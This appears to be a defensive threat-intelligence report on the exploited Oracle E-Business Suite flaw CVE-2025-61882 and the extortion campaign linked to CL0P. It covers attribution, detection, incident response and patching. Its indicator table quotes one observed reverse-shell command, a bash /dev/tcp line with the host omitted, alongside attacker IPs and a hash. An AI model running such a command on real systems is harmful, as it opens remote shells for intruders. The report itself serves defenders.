1. Executive Summary
In October 2025, multiple threat intelligence and government sources reported active exploitation of a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. Oracle confirmed the issue and released an out-of-band Security Alert with patches and indicators of compromise, while CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalogue—strongly suggesting real-world exploitation at scale. (oracle.com)
Reporting from Google Threat Intelligence and CrowdStrike linked the activity to the CL0P/Clop extortion ecosystem, describing a campaign focused on data theft and extortion rather than immediate ransomware deployment. (Google Cloud)
Organisations running internet-facing Oracle EBS (12.2.3–12.2.14) should treat this as a high-priority incident-response scenario: patching alone may be insufficient if compromise predates remediation. (NVD)
2. Contextual Background
2.1 Nature of the threat
CVE-2025-61882 impacts Oracle EBS Oracle Concurrent Processing (component: BI Publisher Integration) and is rated CVSS 9.8. It is remotely exploitable without authentication over HTTP and can enable takeover/remote code execution. (oracle.com)
Oracle issued an out-of-band Security Alert Advisory and urged customers to apply updates “as soon as possible,” noting prerequisite patching requirements (including prior CPU dependencies). (oracle.com)
Key references
- Oracle vendor advisory: Oracle Security Alert Advisory for CVE-2025-61882. (oracle.com)
- NVD entry: CVE-2025-61882. (NVD)
2.2 Threat-actor attribution
Several sources associate the campaign with the CL0P brand and its broader extortion operations:
- Google Threat Intelligence describes a “CL0P extortion campaign” following months of intrusion activity and exploitation as early as 9 August 2025. (Google Cloud)
- CrowdStrike assesses with moderate confidence that GRACEFUL SPIDER is likely involved (a tracker often associated with Clop-linked activity), while acknowledging the possibility of multiple actors exploiting the same CVE. (CrowdStrike)
- Reuters reported Oracle customer extortion emails and noted Google’s linkage of the activity to cl0p. (Reuters)
Confidence (Admiralty/NATO style): Likely
Based on multiple reputable sources linking the extortion operation to the CL0P ecosystem, but with explicit caveats that more than one actor may have leveraged the vulnerability. (Google Cloud)
2.3 Sector and geographic targeting
The campaign appears broad and opportunistic, consistent with prior CL0P-style “mass exploitation → data theft → delayed extortion” operations. Google notes high-volume outreach to executives and evidence of exfiltrated file listings to substantiate claims, suggesting multi-sector targeting. (Google Cloud)
UK-facing impact has been referenced in public reporting and alerts, including coverage of NHS-related claims (not all of which are independently verifiable without victim confirmation). (bankinfosecurity.com)
3. Technical Analysis
3.1 Vulnerability and TTP overview (mapped to MITRE ATT&CK)
The observed activity described by Oracle, Google, and CrowdStrike aligns to the following ATT&CK techniques (mapping is an analyst interpretation based on behaviours described in cited reporting):
- Initial access via exploitation of an internet-facing enterprise application: T1190 (Google Cloud)
- Execution of shell commands on compromised hosts (Oracle-provided observed command indicates interactive shell and outbound TCP): T1059 (oracle.com)
- Data theft and extortion model (exfiltration to enable coercion): TA0010 Exfiltration (specific sub-technique depends on observed channel; sources indicate substantial data exfiltration but do not fully enumerate transport for all cases). (Google Cloud)
Google further reports a multi-stage Java implant framework used to compromise EBS environments, indicating post-exploitation tooling beyond a single-shot exploit. (Google Cloud)
3.2 Exploitation status and PoC availability
- Confirmed active exploitation: Oracle’s Security Alert and multiple government/industry sources describe exploitation “in the wild.” (oracle.com)
- CISA KEV listing: Inclusion in KEV is a strong signal of exploitation affecting real organisations and triggers US federal remediation deadlines. (CISA)
- Public PoC code: Public repositories purport to provide PoC/exploit code for CVE-2025-61882. Treat these as dangerous and assume weaponisation risk increased after disclosure. (GitHub)
4. Impact Assessment
4.1 Severity and scope
CVE-2025-61882 is CVSS 9.8 (Critical) and allows unauthenticated compromise of a core EBS component. (NVD)
Campaign reporting indicates data exfiltration and extortion, with Oracle customers receiving extortion emails claiming theft from Oracle EBS applications. (Google Cloud)
4.2 Victim profile
Most at-risk are organisations with:
- Internet-exposed Oracle EBS instances (especially those behind weak perimeter controls)
- Unpatched versions in the affected range (12.2.3–12.2.14) (NVD)
5. Indicators of Compromise (IOCs)
5.1 IOC table
Below are vendor-published IOCs (plus campaign-specific infrastructure reported by Google). Do not treat absence of these IOCs as proof of safety—Oracle explicitly notes indicators represent observed activity “not limited to CVE-2025-61882.” (oracle.com)
| Type | Value | Context / Notes | Source |
|---|---|---|---|
| IP address | 200[.]107[.]207[.]26 | Potential GET/POST activity (observed) | Oracle Security Alert (oracle.com) |
| IP address | 185[.]181[.]60[.]11 | Potential GET/POST activity (observed) | Oracle Security Alert (oracle.com) |
| Command | sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Observed command consistent with establishing outbound shell over TCP (exact port omitted in Oracle table) | Oracle Security Alert (oracle.com) |
| SHA-256 | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | Hash associated with a purported EBS exploit archive shared publicly (also referenced by CrowdStrike) | Oracle Security Alert; CrowdStrike (oracle.com) |
| Email contact | [email protected] | Extortion email contact observed in campaign reporting | Google Threat Intelligence (Google Cloud) |
| Email contact | [email protected] | Extortion email contact observed in campaign reporting | Google Threat Intelligence (Google Cloud) |
5.2 Detection guidance
- Network detections: Alert on suspicious/novel inbound requests to EBS endpoints associated with BI Publisher integration / Concurrent Processing, especially from untrusted geographies or IPs with no prior business justification. (Vendor and CTI reporting indicates HTTP-based unauthenticated exploitation.) (NVD)
- Threat hunting: Prioritise log review for unexpected process execution spawned by EBS application services, and outbound connections indicative of interactive shells (Oracle’s observed command suggests this pattern). (oracle.com)
- Leverage public detections where appropriate: SOC Prime and other detection communities published content around CVE-2025-61882 hunting. Validate rules in a test environment before production deployment. (SOC Prime)
6. Incident Response Guidance
6.1 Containment, eradication, recovery
- Containment
- If feasible, remove Oracle EBS from direct internet exposure immediately (restrict via VPN, allowlists, reverse proxy/WAF).
- Block Oracle-published malicious IPs at perimeter controls while you investigate. (oracle.com)
- Eradication
- Apply Oracle’s Security Alert patches for CVE-2025-61882 and ensure prerequisite patches are met (Oracle notes prerequisite CPU dependencies). (oracle.com)
- Hunt for persistence and implants (Google describes a multi-stage Java implant framework). (Google Cloud)
- Recovery
- Rotate credentials associated with EBS application/service accounts and any identities accessible from the EBS host.
- Rebuild systems if integrity cannot be assured; restore from known-good backups and validate before re-exposure.
6.2 Forensic artefacts to collect
- EBS application logs (access/error), reverse proxy/WAF logs, and any HTTP request logs around suspected exploitation windows (noting activity as early as July–August 2025 in reporting). (Google Cloud)
- Process execution telemetry and parent/child process trees on EBS servers (to validate command execution patterns). (oracle.com)
- Egress logs (firewall, proxy, DNS) to identify data exfiltration channels.
6.3 Lessons learned
- Treat ERP/enterprise application exposure as equivalent to exposing identity infrastructure: minimise attack surface, enforce layered controls, and instrument aggressively.
7. Threat Intelligence Contextualisation
7.1 Similar campaign patterns
Google highlights a model associated with CL0P-branded activity: mass exploitation of high-value enterprise software → data theft → delayed extortion, previously seen in managed file transfer (MFT) campaigns. (Google Cloud)
This matters operationally: defenders often see “quiet” intrusion and exfiltration weeks before public naming-and-shaming or leak-site posting. (Google Cloud)
7.2 ATT&CK lifecycle mapping (observed/assessed)
| Tactic | Technique ID | Technique Name | Observed behaviour |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Unauthenticated exploitation of Oracle EBS via CVE-2025-61882 (HTTP) (NVD) |
| Execution | T1059 | Command and Scripting Interpreter | Oracle-published observed shell command indicating interactive shell execution (oracle.com) |
| Exfiltration | TA0010 | Exfiltration (tactic) | Google/CrowdStrike describe data exfiltration as campaign objective (Google Cloud) |
8. Mitigation Recommendations
8.1 Hardening and configuration
- Patch immediately using Oracle’s Security Alert guidance and ensure prerequisite CPUs are applied. (oracle.com)
- Reduce exposure: Keep EBS behind a VPN or dedicated access gateway; limit inbound management and application paths to known IP ranges.
- Add compensating controls: WAF rules, strict request validation, and anomaly detection for rare endpoints within EBS components.
8.2 Patch management priorities
- Prioritise CVE-2025-61882 (CVSS 9.8) and any follow-on EBS issues referenced in ongoing reporting, given demonstrated exploitation and KEV inclusion. (NVD)
- Where patching requires downtime, implement emergency containment (isolation and strict allowlisting) until maintenance windows can be executed.
9. Historical Context & Related Vulnerabilities
Oracle EBS has a history of high-impact vulnerabilities drawing attacker interest; threat reporting around this campaign also discusses additional EBS vulnerabilities and exploit chains observed in 2025 beyond CVE-2025-61882. (Google Cloud)
10. Future Outlook
Given the availability of public PoC tooling and the high value of EBS environments, opportunistic scanning and exploitation will likely continue, including by actors outside the CL0P ecosystem. (CrowdStrike)
Expect increased use of data theft-first extortion (rather than immediate encryption), because it reduces operational friction and speeds monetisation—especially against complex enterprise platforms. (Google Cloud)
11. Further Reading
Vendor / Government
- Oracle Security Alert Advisory for CVE-2025-61882 (oracle.com)
- NVD entry for CVE-2025-61882 (NVD)
- CISA KEV catalogue entry for CVE-2025-61882 (CISA)
- NHS England cyber alert referencing exploitation of CVE-2025-61882 (NHS England Digital)
- Canadian Centre for Cyber Security alert (AL25-013) (Canadian Centre for Cyber Security)
Threat intelligence / Research
- Google Threat Intelligence: Oracle EBS zero-day exploited in widespread extortion campaign (Google Cloud)
- CrowdStrike: Campaign targeting Oracle EBS via CVE-2025-61882 (CrowdStrike)
- Rapid7 analysis of CVE-2025-61882 exploitation (Rapid7)
- watchTowr Labs technical write-up on the exploit chain (watchTowr Labs)